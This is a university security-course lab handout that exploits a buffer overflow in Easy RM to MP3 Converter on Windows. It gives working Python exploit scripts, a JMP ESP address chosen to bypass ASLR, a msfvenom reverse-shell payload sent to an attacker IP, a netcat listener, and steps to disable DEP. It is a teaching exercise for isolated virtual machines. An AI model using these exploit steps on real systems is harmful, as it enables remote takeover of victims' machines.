Proj 10: Exploiting Easy RM to MP3 Converter on Windows with ASLR (20 pts.)

Purpose

Learn how to exploit a simple buffer overflow vulnerability to gain Remote Code Execution on Windows, defeating Address Space Layout Randomization.

We will use these tools:

What You Need

WARNING

This application is unsafe to run. The Windows machine will be vulnerable to compromise. I recommend performing this project on virtual machines with NAT networking mode, so no outside attacker can exploit your windows machine.

Installing the Vulnerable Application

On your Windows machine, in a Web brower, go to

http://www.exploit-db.com/exploits/10374/

Click the icon to the right of the label "Dowload Vulnerable App", as shown below. If that link doesn't work, try this alterative download link.

The software downloads, with a long name starting with 707. Install the software with its default options. The program launches. as shown below.

After a few seconds, a "Preferences" box appears, as shown below.

Click OK.

Fuzzing: Length 10,000

We'll make a fuzzer that creates an attack file.

On your Kali Linux machine, in a Terminal window, execute this command:

nano ezm-fuzz1
#!/usr/bin/python
attack = 'A' * 10000
print attack

To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.

Next you need to make the program executable. To do that, in Kali Linux, in a Terminal window, execute this command:

chmod a+x ezm-fuzz1
In the Terminal window, execute this command to run the program, and put the output into a file named ezm-fuzz1.m3u:
./ezm-fuzz1 > ezm-fuzz1.m3u
In the Terminal window, execute this command to see the files you just created (note the command is "LS -L EZM*" all in lowercase; it does not contain any numeral 1 characters):
ls -l ezm*
You should see a file named ezm-fuzz1.m3u with a size of 10001, as shown below:

In the Terminal window, execute this command to see the attack file:

nano ezm-fuzz1.m3u
The file contains a long line of "A" characters, as shown below:

Press Ctrl+X to exit the nano editor.

Copying the File from Kali to Windows

In the Terminal window, execute this command to copy the attack file to your Kali desktop:
cp ezm-fuzz1.m3u ~/Desktop
On your Kali desktop, the file appears on your desktop, as shown below:

Drag the file from the Kali desktop to the desktop of your host machine. If you are using a Windows host as the target, you're done.

If you are using a Windows virtual machine as the target, you need to drag the file from the host machine's desktop to the Windows desktop.

Opening the Attack File: Length 10,000

On your Windows machine, in the "Easy RM to MP3 Converter" box, click Load.

In the Open box, at the top, in the "Look in" drop-down list box, select Desktop.

At the bottom, in the "Files of type" drop-down list box, select "Playlist Files".

Double-click the ezm-fuzz1.m3u file, as shown below:

An error message appears, as shown below:

The program did not crash. It's still processing instructions as the designer intended, so this attack failed.

In the error box, click OK.

The program now shows a "AAAAAAAAAAA" message, as shown below.

To get rid of that, close "Easy RM to MP3 Converter" and re-open it from the Start button.

Fuzzing: Lengths 20,000 and 30,000

In the Terminal window, execute these commands to copy your fuzzer twice:
cp ezm-fuzz1 ezm-fuzz2
cp ezm-fuzz1 ezm-fuzz3
In the Terminal window, execute this command to edit your ezm-fuzz2 file:
nano ezm-fuzz2
Change the length in the file from 10000 to 20000, as shown below:

To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.

In the Terminal window, execute this command to run the program, and put the output into a file named ezm-fuzz2.m3u:

./ezm-fuzz2 > ezm-fuzz2.m3u
In the Terminal window, execute this command to copy the attack file to your Kali desktop:
cp ezm-fuzz2.m3u ~/Desktop
Repeat the steps above to modify ezm-fuzz3 to use a length of 30000, create an attack file named ezm-fuzz3.m3u, and copy it to your Kali desktop.

In the Terminal window, execute this command:

ls -l ezm*
You should see three .m3u files, with lengths of 10001, 20001, and 30001, as shown below:

Drag the ezm-fuzz2.m3u and ezm-fuzz3.m3u files from your Kali Desktop to your Windows target machine.

Opening the Attack File: Length 20,000

On your Windows machine, in "Easy RM to MP3 Converter", open the ezm-fuzz2.m3u file.

The same error message appears, as shown below:

Once again, the program did not crash.

Close the error message. Close "Easy RM to MP3 Converter". Launch "Easy RM to MP3 Converter" again from the Start button.

If a box pops up warning you that this is a trial version, close it.

Opening the Attack File: Length 30,000

On your Windows machine, in "Easy RM to MP3 Converter", open the ezm-fuzz3.m3u file.

Now it crashes, with the message "Easy RM to MP3 Converter has stopped working". The details say "APPCRASH", as shown below:

This is more promising--the application encountered an error it could not handle.

In the error message, click "Close the program".

Observing the Crash in the Immunity Debugger

You should have Immunity and Mona installed from a previous project.

Launch Immunity with Administrator privileges.

In Immunity, click File, Open.

Navigate to

C:\Program Files\Easy RM to MP3 Converter\RM2MP3Converter.exe
When the panes fill with text, click the magenta Run button.

"Easy RM to MP2 Converter" opens in Immunity, as shown below. It may not pop to the front--you may have to click its icon on the Taskbar and click OK.

In "Easy RM to MP3 Converter", open the ezm-fuzz3.m3u file.

In Immunity, at the bottom left, you see "Access violation when executing [41414141]", as shown below.

This is what we needed--a classic buffer overflow. Some of the "A" characters ended up in the EIP, as the address of the next instruction to be executed, so we have a way to take control of the computer.

Saving a Screen Image

Make sure the "Access violation when executing [41414141]" message is visible.

Press the PrintScrn key to copy the whole desktop to the clipboard.

YOU MUST SUBMIT A FULL-SCREEN IMAGE FOR FULL CREDIT!

Paste the image into Paint.

Save the document with the filename "YOUR NAME Proj 10a", replacing "YOUR NAME" with your real name.

Restarting Immunity and "Easy RM to MP3 Converter"

Close Immunity.

Launch Immunity with Administrator privileges.

In Immunity, click File. In the lower section, click item 1: "C:\Program Files\Easy RM to MP3 Converter\RM2MP3Converter.exe", as shown below.

Click the Run button.

Creating a Nonrepeating Pattern of Characters

We know that the four bytes that end up in the EIP are somewhere between 20,000 and 30,000 characters into the file.

So we need to send 20,000 'A' characters followed by a series of 2,500 nonrepeating groups of four characters.

A simple way to do that is to start with a letter from A to Y, repeated twice, and then use two digits from 00 to 99, like this (spaces added for clarity):

AA00 AA01 AA02 ... AA98 AA99 
BB00 BB01 BB02 ... BB98 BB99 
             ...
PP00 ...  PP22 PP23 ... PP99 
             ...
YY00 YY01 YY02 ... YY98 YY99 
On your Kali Linux machine, in a Terminal window, execute this command:
nano ezm-eip0
In the nano window, type or paste this code.
#!/usr/bin/python

chars = ''
for a in range(0x41, 0x5A):
   for i in range(0x30, 0x3A):
      for j in range(0x30, 0x3A):
         chars += chr(a) + chr(a) + chr(i) + chr(j)
print chars

To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.

Next you need to make the program executable. To do that, in Kali Linux, in a Terminal window, execute this command:

chmod a+x ezm-eip0
On your Kali Linux machine, in a Terminal window, execute this command:
./ezm-eip0 
A lot of text scrolls by, ending with the groups starting with YY, as shown below.

Inserting the Nonrepeating Pattern in an Attack

On your Kali Linux machine, in a Terminal window, execute this command:
nano ezm-eip1
In the nano window, type or paste this code.
#!/usr/bin/python

prefix = 'A' * 20000
chars = ''
for a in range(0x41, 0x5A):
   for i in range(0x30, 0x3A):
      for j in range(0x30, 0x3A):
         chars += chr(a) + chr(a) + chr(i) + chr(j)
attack = prefix + chars
print attack

To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.

On your Kali Linux machine, in a Terminal window, execute these commands:

chmod a+x ezm-eip1

./ezm-eip1 > ezm-eip1.m3u

cp ezm-eip1.m3u ~/Desktop
Drag the ezm-eip1.m3u file to your Windows machine and open it in "Easy RM to MP3 Converter". The lower left corner of the Immunity window now says "Access violation when executing [32505032]", as shown below.

Note: When I did this on Windows Server 2008, it crashed at a slightly different offset, 10 bytes less. If that happens to you, just adjust the attack as needed.

Use the chart below to convert these characters to ASCII.

The characters are '2PP2'. They are in reverse order, technically, but it makes no difference in this case.

Those bytes appear here:

Each row has 100 four-byte sequences; a total of 400 bytes.

P is the 16th letter of the alphabet, so there are 15 complete rows before '2PP2'.

So the total number of bytes before '2PP2' is:

15*400 + 22*4 + 3

Restarting Immunity and "Easy RM to MP3 Converter"

Close Immunity.

Launch Immunity with Administrator privileges.

In Immunity, click File. In the lower section, click item 1: "C:\Program Files\Easy RM to MP3 Converter\RM2MP3Converter.exe".

Click the Run button.

Targeting the EIP Precisely

Let's make sure we can hit the EIP.

On your Kali Linux machine, in a Terminal window, execute this command:

nano ezm-eip2
In the nano window, type or paste this code.
#!/usr/bin/python

prefix = 'A' * (20000 + 15*400 + 22*4 + 3)
eip = 'BCDE'
padding = 'F' * (30000 - len(prefix) - 4)
attack = prefix + eip + padding
print attack

To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.

On your Kali Linux machine, in a Terminal window, execute these commands:

chmod a+x ezm-eip2

./ezm-eip2 > ezm-eip2.m3u

cp ezm-eip2.m3u ~/Desktop
Drag the ezm-eip2.m3u file to your Windows machine and open it in "Easy RM to MP3 Converter". The lower left corner of the Immunity window now says "Access violation when executing [45444342]", as shown below.

Troubleshooting

On 4-5-17 I helped a student do this project, and this script did not work precisely---the eip was still 41414141. To hit the EIP, we had to decrease the number of "A"'s by 10 in this and all later scripts.

You may need to make a similar adjustment.

It worked! The EIP is now 'EDCB', the four bytes I inserted there, in reverse order.

Saving a Screen Image

Make sure the "Access violation when executing [45444342]" message is visible.

Press the PrintScrn key to copy the whole desktop to the clipboard.

YOU MUST SUBMIT A FULL-SCREEN IMAGE FOR FULL CREDIT!

Paste the image into Paint.

Save the document with the filename "YOUR NAME Proj 10b", replacing "YOUR NAME" with your real name.

Examining Memory at ESP

Let's see what ended up at the location pointed to by ESP.

In the upper right pane of Immunity, left-click the value to the right of ESP, so it's highlighted in blue, as shown below.

Then right-click the highlighted value and click "Follow in Dump".

Look in the lower left pane of Immunity. It's full of the 'F' characters we put at the end of the exploit text.

But are there 'F' characters before ESP? To find out, scroll the lower left pane up one row.

Now you can see that there are only four 'F' characters before the ESP, as shown below.

So we can put our shellcode immediately after the first 4 'F' characters.

Listing Modules with Mona

In Immunity, at the bottom, there is a white bar. Click in that bar and type this command, followed by the Enter key:

!mona modules
There are a lot of modules available now, about two screens full!

Finding a Module that Doesn't Move

We need a module that doesn't change its address each time the program is launched.

The best thing would be to find one with ASLR=False and Rebase=False, but the only module like that is RM2MP3Converter.exe. However, we can't use that module, because it has a null byte in its address.

So the next thing to try is to see if a module with Rebase=True and ASLR=False doesn't move in practice, even though it could, in principle, be rebased.

I saved logs from three runs of Immunity, and kept only the modules with ASLR=False.

Here are my results:

Look at the "Base" address. The first item, "MSRMfilter03.dll" doesn't move!

Finding a JMP ESP

In Immunity, at the bottom, there is a white bar. Click in that bar and type this command, followed by the Enter key:

!mona jmp -r esp -m MSRMfilter03.dll

There is one useful address, as shown below:

0x1001b058

Restarting Immunity and "Easy RM to MP3 Converter"

Close Immunity.

Launch Immunity with Administrator privileges.

In Immunity, click File. In the lower section, click item 1: "C:\Program Files\Easy RM to MP3 Converter\RM2MP3Converter.exe".

Click the Run button.

Testing Code Execution

Let's make sure we can run the code at the location we plan to inject into EIP.

Instead of real shellcode, we'll use a 16-byte NOP sled followed by an INT 3 ('\xCC').

If the code executes properly, it will slide down the NOP sled and halt at the INT 3.

On your Kali Linux machine, in a Terminal window, execute this command:

nano ezm-eip4
In the nano window, type or paste this code:
#!/usr/bin/python

prefix = 'A' * (20000 + 15*400 + 22*4 + 3)
eip = '\x58\xb0\x01\x10'
skip4 = 'FFFF'
nopsled = '\x90' * 16
int3 = '\xCC'
padding = 'F' * (30000 - len(prefix) - 4 -4 -16 -1)
attack = prefix + eip + skip4 + nopsled + int3 + padding
print attack

To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.

On your Kali Linux machine, in a Terminal window, execute these commands:

chmod a+x ezm-eip4

./ezm-eip4 > ezm-eip4.m3u

cp ezm-eip4.m3u ~/Desktop
Drag the ezm-eip4.m3u file to your Windows machine and open it in "Easy RM to MP3 Converter".

The lower left corner of the Immunity window now says "INT3 command", as shown below.

Troubleshooting

If execution stops at a NOP, you have Data Execution Prevention turned on.

To turn it off, open Computer Properties.

In the next window, on the left side, click "Advanced system settings".

On the Advanced tab, in the Performance section, click Settings.

In "Performance Options", on the "Data Execution Prevention" tab, click "Turn on DEP for essential Windows programs and services only".

Click OK.

Click OK.

Restart your Windows server.

In the upper left pane of Immmunity, scroll up to see the NOP sled, followed by the INT3.

Immunity misinterpreted the first few bytes of the NOP sled, but that doesn't matter--the NOP sled executed.

Everything worked correctly--we are executing code we injected!

Closing Immunity

Close Immunity.

Avoiding Bad Characters

Notice that we have a lot of space to put exploit code--several thousand bytes.

In a case like this, we can use a very simple exploit encoding, restricting the encoded output to alphanumeric characters, thus avoiding concerns about bad characters.

Finding your Kali Machine's IP Address

On your Kali Linux machine, in a Terminal window, execute this command.
ifconfig
Find your Kali machine's IP address and make a note of it.

Generating Exploit Code

On your Kali Linux machine, in a Terminal window, execute the command below.

Replace the IP address with the IP address of your Kali Linux machine.

msfvenom -p windows/shell_reverse_tcp LHOST="192.168.119.130" LPORT=443 EXITFUNC=thread -e x86/alpha_mixed -f python > ezm-attack2

This command makes an exploit that will connect from the Windows target back to the Kali Linux attacker on port 443 and execute commands from Kali.

The exploit is output directly into a file named "ezm-attack2" because it's too long to see all at once in a Terminal window.

Completing the Attack Code

On your Kali Linux machine, in a Terminal window, execute the command below.

nano ezm-attack2
The exploit code appears, as shown below.

Add these lines to the start of the file, as shown below:

#!/usr/bin/python

prefix = 'A' * (20000 + 15*400 + 22*4 + 3)
eip = '\x58\xb0\x01\x10'
skip4 = 'FFFF'
nopsled = '\x90' * 16

Scroll to the bottom of the file.

Add these lines at the bottom, as shown below:

padding = 'F' * (30000 - len(prefix) - 4 - 4 - 16 -len(buf))
attack = prefix + eip + skip4 + nopsled + buf + padding
print attack

To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.

On your Kali Linux machine, in a Terminal window, execute these commands:

chmod a+x ezm-attack2

./ezm-attack2 > ezm-attack2.m3u

cp ezm-attack2.m3u ~/Desktop

Starting a Listener

On your Kali Linux machine, in a Terminal window, execute this command:
nc -nlvp 443
Drag the ezm-attack2.m3u file to your Windows machine.

Open "Easy RM to MP3 Converter" from the Start button. You don't need to use Immunity.

In "Easy RM to MP3 Converter", open the ezm-attack.m3u file.

You should see a Windows command prompt in Kali--now you own the Windows box!

Saving a Screen Image

Make sure the "Microsoft Windows" message is visible.

Press the PrintScrn key to copy the whole desktop to the clipboard.

YOU MUST SUBMIT A FULL-SCREEN IMAGE FOR FULL CREDIT!

Paste the image into Paint.

Save the document with the filename "YOUR NAME Proj 10c", replacing "YOUR NAME" with your real name.

Turning in your Project

Email the images to cnit.127sam@gmail.com with the subject line: Proj 10 from YOUR NAME

Sources

Exploit writing tutorial part 1 : Stack Based Overflows

http://www.exploit-db.com/exploits/10374/

Alphanumeric Shellcode


Posted 7-1-14 7:38 am by Sam Bowne
Revised 8:24 am with better way to find JMP ESP (ty @corelanc0d3r)
Revised 9:25 am; now working with ASLR thanks to @corelanc0d3r!
Revised for use at CCSF and tested on Kali 2 and Win Server 2008 9-27-15
Off-by-10 "Troubleshooting" tip added 4-6-17
DEP tip added 4-7-17